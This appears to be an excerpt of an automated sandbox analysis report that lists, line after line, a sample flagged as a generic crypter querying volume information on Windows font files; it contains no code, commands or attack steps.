Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
